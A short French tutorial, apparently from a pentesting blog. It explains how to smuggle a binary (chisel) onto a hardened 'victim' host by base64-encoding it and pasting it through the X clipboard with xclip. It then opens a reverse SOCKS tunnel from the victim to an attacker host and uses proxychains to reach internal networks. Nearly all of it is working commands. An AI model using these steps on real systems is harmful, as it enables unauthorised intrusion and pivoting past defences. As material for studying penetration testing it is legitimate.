Transfert de fichiers avec xclip lorsqu’aucun logiciel n’est disponible sur la victime

La victime a limité au minimum le nombre de logiciels disponibles pour qu’il soit particulièrement difficile pour un attaquant d’obtenir le compte de l’administrateur ou encore d’exfiltrer de l’information. Donc, les utitaires scp, nc, ncat, netcat, ftp smbclient, bash ne sont pas disponibles. Il existe une méthode peu connue pour copier un fichier si vous utilisez kali et une sessionX et qu’aucun utilitaire n’est offert. Le principale est simple, vous envoyer le fichier par le terminal , caractère par caractère! Pas manuellement, mais avec l’utilitaire xclip. Voici comment procéder.

apt install xclip

xclip permet de copier un fichier en utilisant le clipboard du serveur X

pour se faire, vous encodez le fichier au format base64 et le copier dans le clipboard

cat chisel | base64 -w500 | xclip -sel o #sur l'ordinateur de l'attaquant (XServer). ceci permettra de copier chisel (ou un autre fichier) sur la vitime pour infiltrer le réseau

Sur la victime

cat << EOF > chisel.base64
#ici on utilise les touches SHIFT+INSERT ou le bonton droit de la souris et Paste Selection
#on attend que le clipboard soit totalement affiché...
EOF

cat chisel.base64 | base64 -d > chisel
chmod +x chisel

Dans le fichier /etc/proxychains.conf de l’attaquant

[ProxyList]
socks5   127.0.0.1 1080

Sur l’attaquant
sudo ./chisel server -p 8000 --reverse

Sur la victime
./chisel client 10.9.0.24:8000 R:socks

On peut maintenant accéder aux réseaux disponibles sur la victime en utilisant notre proxy sur le port 1080

proxychains curl 192.168.3.22:3386 -v

Laisser un commentaire